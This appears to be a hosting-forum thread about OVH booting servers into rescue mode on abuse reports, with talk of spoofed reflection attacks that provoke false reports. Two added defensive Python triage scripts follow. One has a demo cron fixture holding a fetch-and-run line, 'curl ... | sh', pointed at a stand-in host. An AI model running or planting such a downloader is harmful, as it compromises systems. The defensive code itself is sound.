OVH will shut down your server if an abuse report is received.

Jamie_DreamIT Member, Host Rep

I learned something new about OVH...

On Christmas Eve, one of our servers received an abuse report (typical for a hosting provider).

We typically action these reports within a couple of hours, but it seems now that OVH will immediately reboot your server into rescue mode once an abuse report is created.

I've never heard of any host performing this action other than suspending the network port.

I'm glad we're moving our services off their network.

Here's an extract from their support team:

The server will be rebooted into rescue mode if any abuse cases are reported. The abuse team will first reboot the server into rescue mode then email the customer to take necessary action to repair the server.

The abuse team will not request any permission from the customer to reboot the server into rescue mode if the server is reported for abuse cases.

TLDR: OVH will reboot your servers when they feel like it.

Comments

  • edited January 2023
  • Neoon Community Contributor, Veteran

    As far as I do understand this, your server was infected with malware or similar.
    I would have shot it in the face too.

    OVH instead does put it into rescue.
    May be worth checking your customer accounts for malware... and signs of intrusion before OVH acts.

  • @Neoon said:
    As far as I do understand this, your server was infected with malware or similar.
    I would have shot it in the face too.

    OVH instead does put it into rescue.
    May be worth checking your customer accounts for malware... and signs of intrusion before OVH acts.

    That's what support tells you when you got hit with an amplified DDoS attack and someone sends a portscan abuse. I've had it happen quite a few times now, with different hosting providers.

  • Neoon Community Contributor, Veteran

    @treesmokah said:

    @Neoon said:
    As far as I do understand this, your server was infected with malware or similar.
    I would have shot it in the face too.

    OVH instead does put it into rescue.
    May be worth checking your customer accounts for malware... and signs of intrusion before OVH acts.

    That's what support tells you when you got hit with an amplified DDoS attack and someone sends a portscan abuse. I've had it happen quite a few times now, with different hosting providers.

    What, no fucking way, makes no sense.
    Except, your service can actually be used for an amplification attack when ddosed.

  • treesmokah Member
    edited January 2023

    @Neoon said:

    @treesmokah said:

    @Neoon said:
    As far as I do understand this, your server was infected with malware or similar.
    I would have shot it in the face too.

    OVH instead does put it into rescue.
    May be worth checking your customer accounts for malware... and signs of intrusion before OVH acts.

    That's what support tells you when you got hit with an amplified DDoS attack and someone sends a portscan abuse. I've had it happen quite a few times now, with different hosting providers.

    What, no fucking way, makes no sense.
    Except, your service can actually be used for an amplification attack when ddosed.

    "Amplified" nodes can complain, I've had it happen before.
    Some university in the USA was hosting a shitty DNS service and complained that "I" portscanned their network or some shit.

    There are quite a few DDoS attack methods that can result in server suspension for "abuse" on popular hosting providers. It's wild shit but yea, nothing we can really do as long as providers are clueless on attack vectors and treat "abuse" reports like a big thing.

    Thanked by 1kait
  • aqua Member, Patron Provider

    Yeah no.

    When I used OVH they at most nulled the IP. Never touched the server.

  • Isn't it common knowledge never to use OVH for production?

    Thanked by 1angelius
  • @aqua said:
    Yeah no.

    When I used OVH they at most nulled the IP. Never touched the server.

    Possibly a new policy, they did say it happened around Christmas.

  • Here's an extract from their support team:

    The server will be rebooted into rescue mode if any abuse cases are reported. The abuse team will first reboot the server into rescue mode then email the customer to take necessary action to repair the server.

    The abuse team will not request any permission from the customer to reboot the server into rescue mode if the server is reported for abuse cases.

    TLDR: OVH will reboot your servers when they feel like it.

    Do they even check the report if it's true or not?
    "We have a new abuse case, make it into rescue mode and let's wait for the customer's reply."

  • They offer pretty good value outside of that

  • Swiftnode Member, Host Rep
    edited January 2023

    @Neoon said:
    What, no fucking way, makes no sense.
    Except, your service can actually be used for an amplification attack when ddosed.

    It makes plenty of sense, we actually deal with this quite often from the dipshits @ Hetzner. They have an automated abuse system, all someone has to do is spoof your IPs, and Hetzner will automatically respond with a "portscan/flood" notice to your abuse contact.

    There was even one "stresser/booter" website that incorporated "abuse reports" as a DoS vector. They intentionally spoofed the victim IP toward Hetzner's network to generate multiple false positive abuse reports toward your ISP's abuse contacts, with the intent to have your ISP nullroute the victim address. (the website has since been seized by FBI)

    I tried to address this with Hetzner months ago, but I'm not sure it's possible to reach any qualified employee at their company, you just get the level 1 tech support who aren't qualified to use a crayon.

    I did a full write up on this here: https://lowendtalk.com/discussion/180973/prager-it-stefan-prager-absence-and-a-new-dos-vector-brought-to-you-by-hetzner

  • crunchbits Member, Patron Provider, Top Host

    @Swiftnode said:

    @Neoon said:
    What, no fucking way, makes no sense.
    Except, your service can actually be used for an amplification attack when ddosed.

    It makes plenty of sense, we actually deal with this quite often from the dipshits @ Hetzner. They have an automated abuse system, all someone has to do is spoof your IPs, and Hetzner will automatically respond with a "portscan/flood" notice to your abuse contact.

    There was even one "stresser/booter" website that incorporated "abuse reports" as a DoS vector. They intentionally spoofed the victim IP toward Hetzner's network to generate multiple false positive abuse reports toward your ISP's abuse contacts, with the intent to have your ISP nullroute the victim address. (the website has since been seized by FBI)

    I tried to address this with Hetzner months ago, but I'm not sure it's possible to reach any qualified employee at their company, you just get the level 1 tech support who aren't qualified to use a crayon.

    I did a full write up on this here: https://lowendtalk.com/discussion/180973/prager-it-stefan-prager-absence-and-a-new-dos-vector-brought-to-you-by-hetzner

    Just finished reading that. Pretty crazy situation, thanks for sharing and writing it up.

    Thanked by 1Swiftnode
  • Jamie_DreamIT Member, Host Rep

    @aqua said: When I used OVH they at most nulled the IP. Never touched the server.

    That's always been the case for us. I guess not anymore.

  • Decentralized internet, when?

    Thanked by 1op23
  • Virtual Server Will Be Rebooted

  • ..and how to clean/remove malware/infected files if ovh shuts down customer's server?

  • @JasonM said:
    ..and how to clean/remove malware/infected files if ovh shuts down customer's server?

    It is not shut down. Only rebooted to rescue mode. Happened to me once a long time ago without any warning or notification.

  • @JasonM said:
    ..and how to clean/remove malware/infected files if ovh shuts down customer's server?

    Rescue mode can mount your server data and do the investigation into the issue.
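The advice in this part of the thread (check the box for malware and signs of intrusion, mount the disk from rescue mode and investigate) as an added Python example; it is not code from the thread, from OVH or from any rescue image. It assumes the server's root filesystem is mounted, ideally read-only, at a path you pass in (e.g. /mnt inside the rescue system) and walks the usual persistence spots: authorized_keys files, cron entries, system binaries modified recently, and executables dropped in scratch directories. The tree it scans in the demo is constructed in a temp directory; the key comments, cron line and the 198.51.100.9 address are made up for the example.

```python
"""Triage a server's disk from rescue mode before putting it back online.

Added example, not from the thread or OVH. Assumes the server's root
filesystem is mounted (read-only) at `root`, e.g. /mnt in the rescue
image; all paths are relative to that mount. The demo tree is constructed.
"""
import os
import stat
import tempfile
import time

BINARY_DIRS = ("bin", "sbin", "usr/bin", "usr/sbin", "usr/local/bin")
CRON_DIRS = ("etc/cron.d", "var/spool/cron", "var/spool/cron/crontabs")
SCRATCH_DIRS = ("tmp", "var/tmp", "dev/shm")


def _lines(path):
    """Non-empty, non-comment lines of a config file."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        for line in fh:
            line = line.strip()
            if line and not line.startswith("#"):
                yield line


def scan_rescue_mount(root, since=None):
    """Collect the usual persistence and tampering indicators for review."""
    since = time.time() - 7 * 86400 if since is None else since
    out = {"authorized_keys": [], "cron": [], "recent_binaries": [],
           "scratch_executables": []}

    # 1. Who can log in over SSH: every key in every authorized_keys file.
    homes = [os.path.join(root, "root")]
    home_dir = os.path.join(root, "home")
    if os.path.isdir(home_dir):
        homes += [os.path.join(home_dir, d) for d in sorted(os.listdir(home_dir))]
    for home in homes:
        ak = os.path.join(home, ".ssh", "authorized_keys")
        if os.path.isfile(ak):
            for line in _lines(ak):
                fields = line.split()
                comment = fields[-1] if len(fields) >= 3 else "(no comment)"
                out["authorized_keys"].append((os.path.relpath(ak, root), comment))

    # 2. Cron persistence: list every active entry and let a human judge it.
    for cdir in CRON_DIRS:
        d = os.path.join(root, cdir)
        for name in (sorted(os.listdir(d)) if os.path.isdir(d) else []):
            p = os.path.join(d, name)
            if os.path.isfile(p):
                out["cron"] += [(os.path.relpath(p, root), entry) for entry in _lines(p)]

    # 3. System binaries rewritten recently (package upgrades show up too;
    #    compare against the package manager's file list afterwards).
    for bdir in BINARY_DIRS:
        d = os.path.join(root, bdir)
        for name in (sorted(os.listdir(d)) if os.path.isdir(d) else []):
            p = os.path.join(d, name)
            if os.path.isfile(p) and not os.path.islink(p) and os.stat(p).st_mtime >= since:
                out["recent_binaries"].append(os.path.relpath(p, root))

    # 4. Executables dropped in world-writable scratch directories.
    for sdir in SCRATCH_DIRS:
        for dirpath, _, files in os.walk(os.path.join(root, sdir)):
            for name in files:
                p = os.path.join(dirpath, name)
                if os.path.isfile(p) and os.stat(p).st_mode & stat.S_IXUSR:
                    out["scratch_executables"].append(os.path.relpath(p, root))
    return out


def build_demo_tree():
    """Constructed stand-in for a mounted root filesystem (not a real server)."""
    root = tempfile.mkdtemp(prefix="rescue-demo-")
    old = time.time() - 400 * 86400  # pretend these shipped with the OS image

    def put(rel, content, mode=0o644, mtime=None):
        p = os.path.join(root, rel)
        os.makedirs(os.path.dirname(p), exist_ok=True)
        with open(p, "w") as fh:
            fh.write(content)
        os.chmod(p, mode)
        if mtime is not None:
            os.utime(p, (mtime, mtime))

    put("root/.ssh/authorized_keys",
        "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDemoKeyOne ops@laptop\n"
        "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDemoKeyTwo x@x\n")
    put("etc/cron.d/sysupdate",
        "# constructed: a downloader persisted via cron\n"
        "*/5 * * * * root curl -s http://198.51.100.9/x.sh | sh\n")
    put("usr/bin/ls", "#!/bin/sh\n", mode=0o755, mtime=old)
    put("usr/bin/sshd", "#!/bin/sh\n", mode=0o755)  # rewritten after `old`
    put("tmp/.x/run", "#!/bin/sh\n", mode=0o755)
    put("tmp/sess_123", "session data\n")
    return root


if __name__ == "__main__":
    for key, items in scan_rescue_mount(build_demo_tree()).items():
        print(f"{key}:")
        for item in items:
            print("   ", item)
```

On a real box the call is `scan_rescue_mount("/mnt")` after mounting the root volume read-only; the output is a list for a human to read, not a verdict, because a fresh apt/yum upgrade also rewrites binaries and plenty of legitimate cron entries look odd out of context.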

  • Neoon Community Contributor, Veteran

    @Swiftnode said:

    @Neoon said:
    What, no fucking way, makes no sense.
    Except, your service can actually be used for an amplification attack when ddosed.

    It makes plenty of sense, we actually deal with this quite often from the dipshits @ Hetzner. They have an automated abuse system, all someone has to do is spoof your IPs, and Hetzner will automatically respond with a "portscan/flood" notice to your abuse contact.

    There was even one "stresser/booter" website that incorporated "abuse reports" as a DoS vector. They intentionally spoofed the victim IP toward Hetzner's network to generate multiple false positive abuse reports toward your ISP's abuse contacts, with the intent to have your ISP nullroute the victim address. (the website has since been seized by FBI)

    I tried to address this with Hetzner months ago, but I'm not sure it's possible to reach any qualified employee at their company, you just get the level 1 tech support who aren't qualified to use a crayon.

    I did a full write up on this here: https://lowendtalk.com/discussion/180973/prager-it-stefan-prager-absence-and-a-new-dos-vector-brought-to-you-by-hetzner

    Okay but that is a logic error, if you code that into your abuse detection.
    The IP comes from the outside but it's within your network, that doesn't make sense, if the machine itself does not send any traffic that way.

  • Swiftnode Member, Host Rep
    edited January 2023

    @Neoon said:
    Okay but that is a logic error, if you code that into your abuse detection.
    The IP comes from the outside but it's within your network, that doesn't make sense, if the machine itself does not send any traffic that way.

    I think you're misunderstanding what the original comment you replied to was saying. They were referencing reflection attacks, which is when an attacker spoofs the victim IP toward a service, to receive an amplified response toward the victim IP.

    So to loop back to my Hetzner example, spoof multiple IPs that belong to Hetzner's ASN toward a public facing UDP service, eg. DNS, NTP, SRCDS, etc, and those legitimate services will respond to Hetzner's IPs, which would result in them sending an automated abuse complaint to your ISP. (even though there's not much you can do to prevent these types of attacks, as your public facing UDP services believe they are responding to a legitimate request from the victim IPs.)

    This is super common with Valve/Source engine games.

  • jar Patron Provider, Top Host, Veteran

    Well that will do all of absolutely nothing to halt the real abuse in their network right now. The real abuse is coming from people spinning up cloud servers, spamming, deleting the server, and repeating. By the time the complaints roll in, that server is long gone. So if they're cracking down harder to tackle the real problems, this misses the mark completely.

    Thanked by 2webcraft dystopia
  • Maounique Host Rep, Veteran
    edited January 2023

    @jar said: So if they're cracking down harder to tackle the real problems, this misses the mark completely.

    Of course it does.
    Requesting ID, maybe I would send, but also MY picture holding it?

    That being said, I can understand automation in large providers as well as being gamed for a kind of "SWATing" type of DoS, i.e. force an automated abuse report in order to create an automated rescue mode.

    This can only be solved by having smarter people coding the automation and, better yet, any kind of people with half a brain to see those reports and act only in case they hold water.

    In many years this never happened to me, though.

  • Neoon Community Contributor, Veteran

    @Swiftnode said:

    @Neoon said:
    Okay but that is a logic error, if you code that into your abuse detection.
    The IP comes from the outside but it's within your network, that doesn't make sense, if the machine itself does not send any traffic that way.

    I think you're misunderstanding what the original comment you replied to was saying.

    I didn't read the whole post again.
    But still, they didn't seem to keep in mind that the abuse system based on that could be exploited.

  • Welcome to the world.

  • @Swiftnode said: So to loop back to my Hetzner example, spoof multiple IPs that belong to Hetzner's ASN toward a public facing UDP service, eg. DNS, NTP, SRCDS, etc, and those legitimate services will respond to Hetzner's IPs, which would result in them sending an automated abuse complaint to your ISP.

    You can't decide the source IP reliably with UDP. People should only report abuses on TCP which with 3-way handshaking effectively eliminates spoofed IP addresses.
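Swiftnode's description of reflection (spoofed requests at a public UDP service, answered toward the victim) and the comment above about TCP's handshake, combined in one added Python example. It is not code from the thread, from Hetzner or from OVH. It triages an abuse report from the accused server's own unidirectional flow records, which are constructed here in a simplified text format; the addresses come from the documentation ranges, and MY_IP, OPEN_UDP_SERVICES and the amplification threshold are assumptions for the demo. It goes a bit beyond the two cases discussed: spoofed queries we answered (reflection, with the amplification factor), SYN-ACK backscatter from someone spoofing our address at the reporter, TCP we really originated (with or without a completed handshake), and unsolicited UDP we originated, which is the one case that actually warrants the malware check.

```python
"""Triage an abuse report against the accused host's own flow records.

Added example, not from the thread. Flow records are unidirectional:
'proto src:port -> dst:port pkts octets [tcpflags]'. Everything below is
constructed; MY_IP and OPEN_UDP_SERVICES are assumptions for the demo.
"""
from dataclasses import dataclass

MY_IP = "203.0.113.10"                 # constructed: the server named in the report
OPEN_UDP_SERVICES = {53, 123, 27015}   # assumed: DNS, NTP, a Source game server


@dataclass(frozen=True)
class Flow:
    proto: str
    src: str
    sport: int
    dst: str
    dport: int
    pkts: int
    octets: int
    flags: str = ""  # cumulative TCP flag letters seen in this direction: S A P F R


def parse_flows(text):
    """Parse the simplified flow format; '#' lines are comments."""
    flows = []
    for line in text.strip().splitlines():
        parts = line.split()
        if not parts or parts[0].startswith("#"):
            continue
        proto, src, _arrow, dst, pkts, octets, *rest = parts
        sip, sport = src.rsplit(":", 1)
        dip, dport = dst.rsplit(":", 1)
        flows.append(Flow(proto, sip, int(sport), dip, int(dport),
                          int(pkts), int(octets), rest[0] if rest else ""))
    return flows


def _tcp_flags(flows):
    letters = set()
    for f in flows:
        if f.proto == "tcp":
            letters.update(f.flags)
    return letters


def triage(report_ip, flows, amp_threshold=3.0):
    """Classify traffic between MY_IP and the complaining address."""
    inbound = [f for f in flows if f.src == report_ip and f.dst == MY_IP]
    outbound = [f for f in flows if f.src == MY_IP and f.dst == report_ip]
    if not inbound and not outbound:
        return {"verdict": "no-traffic"}

    out_tcp, in_tcp = _tcp_flags(outbound), _tcp_flags(inbound)
    if out_tcp:
        # Our own records show we sent TCP. An off-path spoofer cannot finish
        # the 3-way handshake, so a completed one is what a reporter could
        # legitimately attribute to us; a lone SYN proves nothing to them.
        completed = {"S", "A"} <= out_tcp and {"S", "A"} <= in_tcp
        return {"verdict": "tcp-originated", "handshake_completed": completed}
    if in_tcp:
        # SYN-ACK/RST arriving for connections we never opened: someone
        # spoofed MY_IP toward report_ip and the reporter saw "our" SYNs.
        return {"verdict": "tcp-backscatter", "flags_seen": "".join(sorted(in_tcp))}

    udp_in = [f for f in inbound if f.proto == "udp" and f.dport in OPEN_UDP_SERVICES]
    udp_out = [f for f in outbound if f.proto == "udp"]
    if udp_in and udp_out:
        # Requests "from" report_ip hit a public UDP service and we answered
        # with bigger packets: report_ip was spoofed at us (reflection).
        ratio = sum(f.octets for f in udp_out) / max(1, sum(f.octets for f in udp_in))
        return {"verdict": "udp-reflection", "amplification": round(ratio, 1),
                "amplified": ratio >= amp_threshold}
    if udp_out:
        # Unsolicited UDP from an ephemeral port: this one really is ours.
        return {"verdict": "udp-originated", "octets": sum(f.octets for f in udp_out)}
    return {"verdict": "inbound-only"}


# Constructed sample records (documentation address ranges, not real traffic).
SAMPLE_FLOWS = """
# proto src:port -> dst:port pkts octets [flags]
udp 198.51.100.7:40000 -> 203.0.113.10:53 500 32000
udp 203.0.113.10:53 -> 198.51.100.7:40000 500 1600000
tcp 203.0.113.10:51234 -> 192.0.2.55:22 7 420 SPA
tcp 192.0.2.55:22 -> 203.0.113.10:51234 5 300 SA
tcp 192.0.2.99:80 -> 203.0.113.10:44444 1200 72000 SA
udp 203.0.113.10:50001 -> 198.51.100.200:80 9000 9000000
"""
FLOWS = parse_flows(SAMPLE_FLOWS)

if __name__ == "__main__":
    for reporter in ("198.51.100.7", "192.0.2.55", "192.0.2.99", "198.51.100.200"):
        print(reporter, triage(reporter, FLOWS))
```

The same split is what an automated abuse pipeline on the receiving side would need before nullrouting or rescue-booting anyone: a UDP-only complaint can name any source address the attacker likes, a TCP complaint is only attributable when the reporter saw the handshake complete.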
